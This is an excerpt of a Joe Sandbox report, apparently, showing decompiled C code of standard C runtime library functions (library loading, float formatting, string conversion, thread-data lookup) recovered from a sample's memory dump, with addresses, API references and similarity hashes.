*?, xrefs: 013B8CA4

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 6996c015736a1162d892b3042f17556bb7eeb30af529356147a1e920de5a8c76
Instruction ID: c8d4c80ae7348530dda72d52501874f5ea3041772b5441f5a79af04b8b643514
Opcode Fuzzy Hash: 6996c015736a1162d892b3042f17556bb7eeb30af529356147a1e920de5a8c76
Instruction Fuzzy Hash: 43615DB5D002199FDB15CFACC8C19EDFBF9EF58314B1481AADA15E7701E631AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 013B3163 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013B3163(WCHAR* _a4) {
				struct HINSTANCE__* _t4;

				_t4 = LoadLibraryExW(_a4, 0, 0x800);
				if(_t4 != 0) {
					return _t4;
				} else {
					if(GetLastError() != 0x57 || E013B6698(_a4, L"api-ms-", 7) == 0) {
						return 0;
					}
					return LoadLibraryExW(_a4, 0, 0);
				}
			}

0x013b3170
0x013b3178
0x013b31ad
0x013b317a
0x013b3183
0x00000000
0x013b31aa
0x013b31a9
0x013b31a9

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,013B3114,00000000,00000001,013D9688,?,?,?,013B32B7,00000004,InitializeCriticalSectionEx,013C3C68,InitializeCriticalSectionEx), ref: 013B3170
GetLastError.KERNEL32(?,013B3114,00000000,00000001,013D9688,?,?,?,013B32B7,00000004,InitializeCriticalSectionEx,013C3C68,InitializeCriticalSectionEx,00000000,?,013B3047), ref: 013B317A
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,013B2AE3), ref: 013B31A2

Strings

api-ms-, xrefs: 013B3187

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 012fe1eaa039fab471b79aec157b8a11e600cd52b15e68851b13b31cf8e07dad
Instruction ID: 743a21655795a167f1c0b18599f43c6058604a30c531a0dafa72cd4aee202df9
Opcode Fuzzy Hash: 012fe1eaa039fab471b79aec157b8a11e600cd52b15e68851b13b31cf8e07dad
Instruction Fuzzy Hash: A7E04F31284218BFFF212E65EC46BD93F6CBB01B5AF108020FA0EE84D5F762E5118744

Uniqueness

Uniqueness Score: -1.00%

Function 013B7F1B Relevance: 6.3, APIs: 4, Instructions: 320
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E013B7F1B(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				unsigned int _v24;
				signed int _v32;
				signed int _v40;
				char _v48;
				intOrPtr _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				signed char _t85;
				void* _t91;
				signed int _t95;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t107;
				void* _t108;
				void* _t110;
				void* _t113;
				void* _t115;
				signed int _t117;
				signed int* _t118;
				void* _t121;
				signed int _t123;
				signed int _t129;
				signed int* _t130;
				signed int* _t133;
				signed int _t134;
				signed int _t137;
				signed int _t139;
				signed int _t141;
				signed int _t146;
				signed int _t147;
				signed int _t149;
				signed int _t150;
				void* _t154;
				unsigned int _t155;
				signed int _t162;
				void* _t163;
				signed int _t164;
				signed int* _t165;
				signed int _t168;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t181;

				_t163 = __edx;
				_t173 = _a24;
				if(_t173 < 0) {
					_t173 = 0;
				}
				_t177 = _a8;
				 *_t177 = 0;
				E013B3CB8( &_v60, _t163, _a36);
				_t5 = _t173 + 0xb; // 0xb
				_t185 = _a12 - _t5;
				if(_a12 > _t5) {
					_t133 = _a4;
					_t139 = _t133[1];
					_t164 =  *_t133;
					__eflags = (_t139 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t139 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						__eflags = _t139;
						if(__eflags > 0) {
							L14:
							_t165 = _t177 + 1;
							_t85 = _a28 ^ 0x00000001;
							_v16 = 0x3ff;
							_v5 = _t85;
							_v40 = _t165;
							_v32 = ((_t85 & 0x000000ff) << 5) + 7;
							__eflags = _t139 & 0x7ff00000;
							_t91 = 0x30;
							if((_t139 & 0x7ff00000) != 0) {
								 *_t177 = 0x31;
								L19:
								_t141 = 0;
								__eflags = 0;
								L20:
								_t178 =  &(_t165[0]);
								_v12 = _t178;
								__eflags = _t173;
								if(_t173 != 0) {
									_t95 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v56 + 0x88))))));
								} else {
									_t95 = _t141;
								}
								 *_t165 = _t95;
								_t97 = _t133[1] & 0x000fffff;
								__eflags = _t97;
								_v24 = _t97;
								if(_t97 > 0) {
									L25:
									_t166 = _t141;
									_t142 = 0xf0000;
									_t98 = 0x30;
									_v12 = _t98;
									_v20 = _t141;
									_v24 = 0xf0000;
									do {
										__eflags = _t173;
										if(_t173 <= 0) {
											break;
										}
										_t121 = E013C1EB0( *_t133 & _t166, _v12, _t133[1] & _t142 & 0x000fffff);
										_t154 = 0x30;
										_t123 = _t121 + _t154 & 0x0000ffff;
										__eflags = _t123 - 0x39;
										if(_t123 > 0x39) {
											_t123 = _t123 + _v32;
											__eflags = _t123;
										}
										_t155 = _v24;
										_t166 = (_t155 << 0x00000020 | _v20) >> 4;
										 *_t178 = _t123;
										_t178 = _t178 + 1;
										_t142 = _t155 >> 4;
										_t98 = _v12 - 4;
										_t173 = _t173 - 1;
										_v20 = (_t155 << 0x00000020 | _v20) >> 4;
										_v24 = _t155 >> 4;
										_v12 = _t98;
										__eflags = _t98;
									} while (_t98 >= 0);
									_v12 = _t178;
									__eflags = _t98;
									if(__eflags < 0) {
										goto L42;
									}
									_t117 = E013B8736(__eflags, _t133, _t166, _t142, _t98, _a40);
									_t181 = _t181 + 0x14;
									__eflags = _t117;
									if(_t117 == 0) {
										goto L42;
									}
									_t118 = _t178 - 1;
									_t137 = 0x30;
									while(1) {
										_t149 =  *_t118;
										__eflags = _t149 - 0x66;
										if(_t149 == 0x66) {
											goto L35;
										}
										__eflags = _t149 - 0x46;
										if(_t149 != 0x46) {
											_t133 = _a4;
											__eflags = _t118 - _v40;
											if(_t118 == _v40) {
												_t54 = _t118 - 1;
												 *_t54 =  *(_t118 - 1) + 1;
												__eflags =  *_t54;
											} else {
												__eflags = _t149 - 0x39;
												if(_t149 != 0x39) {
													_t150 = _t149 + 1;
													__eflags = _t150;
												} else {
													_t150 = _v32 + 0x3a;
												}
												 *_t118 = _t150;
											}
											goto L42;
										}
										L35:
										 *_t118 = _t137;
										_t118 = _t118 - 1;
									}
								} else {
									__eflags =  *_t133 - _t141;
									if( *_t133 <= _t141) {
										L42:
										__eflags = _t173;
										if(_t173 > 0) {
											_push(_t173);
											_t115 = 0x30;
											_push(_t115);
											_push(_t178);
											E013B2C30(_t173);
											_t178 = _t178 + _t173;
											__eflags = _t178;
											_v12 = _t178;
										}
										_t99 = _v40;
										__eflags =  *_t99;
										if( *_t99 == 0) {
											_t178 = _t99;
											_v12 = _t178;
										}
										 *_t178 = (_v5 << 5) + 0x50;
										_t104 = E013C1EB0( *_t133, 0x34, _t133[1]);
										_t179 = 0;
										_t105 = _v12;
										_t146 = (_t104 & 0x000007ff) - _v16;
										__eflags = _t146;
										asm("sbb esi, esi");
										_t168 = _t105 + 2;
										_v40 = _t168;
										if(__eflags < 0) {
											L50:
											_t146 =  ~_t146;
											asm("adc esi, 0x0");
											_t179 =  ~_t179;
											_t134 = 0x2d;
											goto L51;
										} else {
											if(__eflags > 0) {
												L49:
												_t134 = 0x2b;
												L51:
												 *(_t105 + 1) = _t134;
												_t174 = _t168;
												_t106 = 0x30;
												 *_t168 = _t106;
												_t107 = 0;
												__eflags = _t179;
												if(__eflags < 0) {
													L55:
													__eflags = _t174 - _t168;
													if(_t174 != _t168) {
														L59:
														_push(_t134);
														_push(_t107);
														_push(0x64);
														_push(_t179);
														_t108 = E013C1DB0();
														_t179 = _t134;
														_t134 = _t146;
														_v32 = _t168;
														_t168 = _v40;
														 *_t174 = _t108 + 0x30;
														_t174 = _t174 + 1;
														_t107 = 0;
														__eflags = 0;
														L60:
														__eflags = _t174 - _t168;
														if(_t174 != _t168) {
															L64:
															_push(_t134);
															_push(_t107);
															_push(0xa);
															_push(_t179);
															_push(_t146);
															_t110 = E013C1DB0();
															_v40 = _t168;
															 *_t174 = _t110 + 0x30;
															_t174 = _t174 + 1;
															_t107 = 0;
															__eflags = 0;
															L65:
															_t147 = _t146 + 0x30;
															__eflags = _t147;
															 *_t174 = _t147;
															 *(_t174 + 1) = _t107;
															_t175 = _t107;
															L66:
															if(_v48 != 0) {
																 *(_v60 + 0x350) =  *(_v60 + 0x350) & 0xfffffffd;
															}
															return _t175;
														}
														__eflags = _t179 - _t107;
														if(__eflags < 0) {
															goto L65;
														}
														if(__eflags > 0) {
															goto L64;
														}
														__eflags = _t146 - 0xa;
														if(_t146 < 0xa) {
															goto L65;
														}
														goto L64;
													}
													__eflags = _t179 - _t107;
													if(__eflags < 0) {
														goto L60;
													}
													if(__eflags > 0) {
														goto L59;
													}
													__eflags = _t146 - 0x64;
													if(_t146 < 0x64) {
														goto L60;
													}
													goto L59;
												}
												_t134 = 0x3e8;
												if(__eflags > 0) {
													L54:
													_push(_t134);
													_push(_t107);
													_push(_t134);
													_push(_t179);
													_t113 = E013C1DB0();
													_t179 = _t134;
													_t134 = _t146;
													_v32 = _t168;
													_t168 = _v40;
													 *_t168 = _t113 + 0x30;
													_t174 = _t168 + 1;
													_t107 = 0;
													__eflags = 0;
													goto L55;
												}
												__eflags = _t146 - 0x3e8;
												if(_t146 < 0x3e8) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t146;
											if(_t146 < 0) {
												goto L50;
											}
											goto L49;
										}
									}
									goto L25;
								}
							}
							 *_t177 = _t91;
							_t141 =  *_t133 | _t133[1] & 0x000fffff;
							__eflags = _t141;
							if(_t141 != 0) {
								_v16 = 0x3fe;
								goto L19;
							}
							_v16 = _t141;
							goto L20;
						}
						if(__eflags < 0) {
							L13:
							 *_t177 = 0x2d;
							_t177 = _t177 + 1;
							__eflags = _t177;
							_t139 = _t133[1];
							goto L14;
						}
						__eflags = _t164;
						if(_t164 >= 0) {
							goto L14;
						}
						goto L13;
					}
					_t175 = E013B822A(_t133, _t139, _t164, _t133, _t177, _a12, _a16, _a20, _t173, 0, _a32, 0, _a40);
					__eflags = _t175;
					if(_t175 == 0) {
						_t129 = E013C1FC0(_t177, 0x65);
						__eflags = _t129;
						if(_t129 != 0) {
							_t162 = ((_a28 ^ 0x00000001) << 5) + 0x50;
							__eflags = _t162;
							 *_t129 = _t162;
							 *((char*)(_t129 + 3)) = 0;
						}
						_t175 = 0;
					} else {
						 *_t177 = 0;
					}
					goto L66;
				}
				_t130 = E013B674B(_t185);
				_t175 = 0x22;
				 *_t130 = _t175;
				E013B4F75();
				goto L66;
			}

0x013b7f1b
0x013b7f26
0x013b7f2b
0x013b7f2d
0x013b7f2d
0x013b7f31
0x013b7f3a
0x013b7f3c
0x013b7f41
0x013b7f44
0x013b7f47
0x013b7f5d
0x013b7f60
0x013b7f65
0x013b7f6f
0x013b7f74
0x013b7fcb
0x013b7fcd
0x013b7fdc
0x013b7fdf
0x013b7fe2
0x013b7fe4
0x013b7feb
0x013b7ffd
0x013b8000
0x013b8005
0x013b8009
0x013b800a
0x013b802a
0x013b802d
0x013b802d
0x013b802d
0x013b802f
0x013b802f
0x013b8032
0x013b8035
0x013b8037
0x013b8048
0x013b8039
0x013b8039
0x013b8039
0x013b804a
0x013b804f
0x013b804f
0x013b8054
0x013b8057
0x013b8061
0x013b8063
0x013b8065
0x013b806a
0x013b806b
0x013b806e
0x013b8071
0x013b8074
0x013b8074
0x013b8076
0x00000000
0x00000000
0x013b808d
0x013b8094
0x013b8098
0x013b809b
0x013b809e
0x013b80a0
0x013b80a0
0x013b80a0
0x013b80a6
0x013b80a9
0x013b80ad
0x013b80af
0x013b80b3
0x013b80b6
0x013b80b9
0x013b80ba
0x013b80bd
0x013b80c0
0x013b80c3
0x013b80c3
0x013b80c8
0x013b80cb
0x013b80ce
0x00000000
0x00000000
0x013b80d7
0x013b80dc
0x013b80df
0x013b80e1
0x00000000
0x00000000
0x013b80e5
0x013b80e8
0x013b80e9
0x013b80e9
0x013b80eb
0x013b80ee
0x00000000
0x00000000
0x013b80f0
0x013b80f3
0x013b80fa
0x013b80fd
0x013b8100
0x013b8115
0x013b8115
0x013b8115
0x013b8102
0x013b8102
0x013b8105
0x013b810f
0x013b810f
0x013b8107
0x013b810a
0x013b810a
0x013b8111
0x013b8111
0x00000000
0x013b8100
0x013b80f5
0x013b80f5
0x013b80f7
0x013b80f7
0x013b8059
0x013b8059
0x013b805b
0x013b8118
0x013b8118
0x013b811a
0x013b811c
0x013b811f
0x013b8120
0x013b8121
0x013b8122
0x013b812a
0x013b812a
0x013b812c
0x013b812c
0x013b812f
0x013b8132
0x013b8135
0x013b8137
0x013b8139
0x013b8139
0x013b8146
0x013b814d
0x013b8154
0x013b8156
0x013b815f
0x013b815f
0x013b8162
0x013b8164
0x013b8167
0x013b816a
0x013b8176
0x013b8176
0x013b817a
0x013b817d
0x013b817f
0x00000000
0x013b816c
0x013b816c
0x013b8172
0x013b8172
0x013b8180
0x013b8180
0x013b8183
0x013b8187
0x013b8188
0x013b818a
0x013b818c
0x013b818e
0x013b81b8
0x013b81b8
0x013b81ba
0x013b81c7
0x013b81c7
0x013b81c8
0x013b81c9
0x013b81cb
0x013b81cd
0x013b81d2
0x013b81d4
0x013b81d8
0x013b81db
0x013b81de
0x013b81e0
0x013b81e1
0x013b81e1
0x013b81e3
0x013b81e3
0x013b81e5
0x013b81f2
0x013b81f2
0x013b81f3
0x013b81f4
0x013b81f6
0x013b81f7
0x013b81f8
0x013b8201
0x013b8204
0x013b8206
0x013b8207
0x013b8207
0x013b8209
0x013b8209
0x013b8209
0x013b820c
0x013b820e
0x013b8211
0x013b8213
0x013b8219
0x013b821e
0x013b821e
0x013b8229
0x013b8229
0x013b81e7
0x013b81e9
0x00000000
0x00000000
0x013b81eb
0x00000000
0x00000000
0x013b81ed
0x013b81f0
0x00000000
0x00000000
0x00000000
0x013b81f0
0x013b81bc
0x013b81be
0x00000000
0x00000000
0x013b81c0
0x00000000
0x00000000
0x013b81c2
0x013b81c5
0x00000000
0x00000000
0x00000000
0x013b81c5
0x013b8190
0x013b8195
0x013b819b
0x013b819b
0x013b819c
0x013b819d
0x013b819e
0x013b81a0
0x013b81a5
0x013b81a7
0x013b81a9
0x013b81ae
0x013b81b1
0x013b81b3
0x013b81b6
0x013b81b6
0x00000000
0x013b81b6
0x013b8197
0x013b8199
0x00000000
0x00000000
0x00000000
0x013b8199
0x013b816e
0x013b8170
0x00000000
0x00000000
0x00000000
0x013b8170
0x013b816a
0x00000000
0x013b805b
0x013b8057
0x013b800c
0x013b8018
0x013b8018
0x013b801a
0x013b8021
0x00000000
0x013b8021
0x013b801c
0x00000000
0x013b801c
0x013b7fcf
0x013b7fd5
0x013b7fd5
0x013b7fd8
0x013b7fd8
0x013b7fd9
0x00000000
0x013b7fd9
0x013b7fd1
0x013b7fd3
0x00000000
0x00000000
0x00000000
0x013b7fd3
0x013b7f91
0x013b7f96
0x013b7f98
0x013b7fa5
0x013b7fac
0x013b7fae
0x013b7fb9
0x013b7fb9
0x013b7fbc
0x013b7fbe
0x013b7fbe
0x013b7fc2
0x013b7f9a
0x013b7f9a
0x013b7f9a
0x00000000
0x013b7f98
0x013b7f49
0x013b7f50
0x013b7f51
0x013b7f53
0x00000000

APIs

_strrchr.LIBCMT ref: 013B7FA5

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: fad8766dc716361c8cf8b021d97d8cc1ff600ac441d063d7818c404656e8a192
Instruction ID: c8cfe2ec214aaa6f45e7d10ff4838e2e60d38cdf63d94165bd15e696deb7f11a
Opcode Fuzzy Hash: fad8766dc716361c8cf8b021d97d8cc1ff600ac441d063d7818c404656e8a192
Instruction Fuzzy Hash: 91B149719012469FDB11CF2CC8C17EEBFF9EF55348F1481A9DA45AB642F6359901CB60

Uniqueness

Uniqueness Score: -1.00%

Function 013B8B75 Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E013B8B75(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a16) {
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t19;
				intOrPtr _t29;
				char _t31;
				intOrPtr _t38;
				intOrPtr* _t40;
				intOrPtr _t41;

				_t40 = _a4;
				if(_t40 != 0) {
					_t31 = 0;
					__eflags =  *_t40;
					if( *_t40 != 0) {
						_t16 = E013B9D52(_a16, 0, _t40, 0xffffffff, 0, 0, 0, 0);
						__eflags = _t16;
						if(__eflags != 0) {
							_t38 = _a8;
							__eflags = _t16 -  *((intOrPtr*)(_t38 + 0xc));
							if(__eflags <= 0) {
								L11:
								_t17 = E013B9D52(_a16, _t31, _t40, 0xffffffff,  *((intOrPtr*)(_t38 + 8)),  *((intOrPtr*)(_t38 + 0xc)), _t31, _t31);
								__eflags = _t17;
								if(__eflags != 0) {
									 *((intOrPtr*)(_t38 + 0x10)) = _t17 - 1;
									_t19 = 0;
									__eflags = 0;
								} else {
									E013B6715(GetLastError());
									_t19 =  *((intOrPtr*)(E013B674B(__eflags)));
								}
								L14:
								return _t19;
							}
							_t19 = E013B91B1(_t38, __eflags, _t16);
							__eflags = _t19;
							if(_t19 != 0) {
								goto L14;
							}
							goto L11;
						}
						E013B6715(GetLastError());
						return  *((intOrPtr*)(E013B674B(__eflags)));
					}
					_t41 = _a8;
					__eflags =  *((intOrPtr*)(_t41 + 0xc));
					if(__eflags != 0) {
						L6:
						 *((char*)( *((intOrPtr*)(_t41 + 8)))) = _t31;
						L2:
						 *((intOrPtr*)(_t41 + 0x10)) = _t31;
						return 0;
					}
					_t29 = E013B91B1(_t41, __eflags, 1);
					__eflags = _t29;
					if(_t29 != 0) {
						return _t29;
					}
					goto L6;
				}
				_t41 = _a8;
				E013B9197(_t41);
				_t31 = 0;
				 *((intOrPtr*)(_t41 + 8)) = 0;
				 *((intOrPtr*)(_t41 + 0xc)) = 0;
				goto L2;
			}

0x013b8b7c
0x013b8b81
0x013b8b9f
0x013b8ba1
0x013b8ba4
0x013b8bd1
0x013b8bd9
0x013b8bdb
0x013b8bf4
0x013b8bf7
0x013b8bfa
0x013b8c08
0x013b8c17
0x013b8c1f
0x013b8c21
0x013b8c3a
0x013b8c3d
0x013b8c3d
0x013b8c23
0x013b8c2a
0x013b8c35
0x013b8c35
0x013b8c3f
0x00000000
0x013b8c3f
0x013b8bff
0x013b8c04
0x013b8c06
0x00000000
0x00000000
0x00000000
0x013b8c06
0x013b8be4
0x00000000
0x013b8bef
0x013b8ba6
0x013b8ba9
0x013b8bac
0x013b8bbf
0x013b8bc2
0x013b8b95
0x013b8b95
0x00000000
0x013b8b98
0x013b8bb2
0x013b8bb7
0x013b8bb9
0x013b8c43
0x013b8c43
0x00000000
0x013b8bb9
0x013b8b83
0x013b8b88
0x013b8b8d
0x013b8b8f
0x013b8b92
0x00000000

APIs

Part of subcall function 013B9197: _free.LIBCMT ref: 013B91A5

Part of subcall function 013B9D52: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,013BEC50,?,00000000,00000000), ref: 013B9DFE

GetLastError.KERNEL32 ref: 013B8BDD
__dosmaperr.LIBCMT ref: 013B8BE4
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 013B8C23
__dosmaperr.LIBCMT ref: 013B8C2A

Memory Dump Source

Source File: 00000000.00000002.243196201.00000000013B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013B0000, based on PE: true

Associated: 00000000.00000002.243191959.00000000013B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243319234.00000000013C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243328524.00000000013CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243343625.00000000013D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243348429.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.243362989.00000000013EC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_c35d4e641adf21bead54611499c416c8e2de75ac96098.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 0465257eb02f5d0711b81dc5a083279d38db3b945b90075749e45f848f4ad8aa
Instruction ID: e66ab2860d7b82d16adca2c8a204088cee5ad932c947ce5381d7b23f8ed57a6f
Opcode Fuzzy Hash: 0465257eb02f5d0711b81dc5a083279d38db3b945b90075749e45f848f4ad8aa
Instruction Fuzzy Hash: 9421C8F160020A6FDB219F698CC1DEBB7ADFF5026C7048559EB1597A50F734EC418760

Uniqueness

Uniqueness Score: -1.00%

Function 013B7B6A Relevance: 6.1, APIs: 4, Instructions: 72
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 75%

			E013B7B6A(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				long _t3;
				intOrPtr _t5;
				long _t6;
				intOrPtr _t9;
				long _t10;
				signed int _t39;
				signed int _t40;
				void* _t43;
				void* _t49;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				long _t56;
				long _t60;
				long _t61;
				void* _t65;

				_t49 = __edx;
				_t43 = __ecx;
				_t60 = GetLastError();
				_t2 =  *0x13ca130; // 0x2
				_t67 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E013B6B20(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t51 = E013B675E(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E013B6B20(__eflags,  *0x13ca130, _t51);
							if(__eflags != 0) {
								E013B7998(_t51, 0x13d9b78);
								E013B67BB(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E013B6B20(__eflags,  *0x13ca130, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E013B6B20(0,  *0x13ca130, 0);
							_push(0);
							L9:
							E013B67BB();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E013B6AE1(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x13ca130; // 0x2
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E013B62D9(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x13ca130; // 0x2
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E013B6B20(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E013B675E(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E013B6B20(__eflags,  *0x13ca130, _t60);
								if(__eflags != 0) {
									E013B7998(_t60, 0x13d9b78);
									E013B67BB(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E013B6B20(__eflags,  *0x13ca130, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E013B6B20(__eflags,  *0x13ca130, _t20);
								_push(_t60);
								L25:
								E013B67BB();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E013B6AE1(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x13ca130; // 0x2
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E013B62D9(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x13ca130; // 0x2
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E013B6B20(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E013B675E(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E013B6B20(__eflags,  *0x13ca130, _t54);
											if(__eflags != 0) {
												E013B7998(_t54, 0x13d9b78);
												E013B67BB(0);
												goto L45;
											} else {
												_t40 = 0;
												E013B6B20(__eflags,  *0x13ca130, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E013B6B20(0,  *0x13ca130, 0);
											_push(0);
											L41:
											E013B67BB();
											goto L36;
										}
									}
								} else {
									_t54 = E013B6AE1(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x13ca130; // 0x2
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x013b7b6a
0x013b7b6a
0x013b7b75
0x013b7b77
0x013b7b7c
0x013b7b7f
0x013b7b9d
0x013b7ba0
0x013b7ba5
0x013b7ba7
0x00000000
0x013b7ba9
0x013b7bb5
0x013b7bb8
0x013b7bb9
0x013b7bbb
0x013b7be0
0x013b7be2
0x013b7bfb
0x013b7c02
0x013b7c07
0x00000000
0x013b7be4
0x013b7be4
0x013b7bed
0x013b7bf2
0x00000000
0x013b7bf2
0x013b7bbd
0x013b7bbd
0x013b7bbd
0x013b7bc6
0x013b7bcb
0x013b7bcc
0x013b7bcc
0x013b7bd1
0x00000000
0x013b7bd1
0x013b7bbb
0x013b7b81
0x013b7b87
0x013b7b8b
0x013b7b98
0x00000000
0x013b7b8d
0x013b7b90
0x013b7c0a
0x013b7c0a
0x013b7b92
0x013b7b92
0x013b7b92
0x013b7b94
0x013b7b94
0x013b7b94
0x013b7b90
0x013b7b8b
0x013b7c0d
0x013b7c15
0x013b7c17
0x013b7c19
0x013b7c21
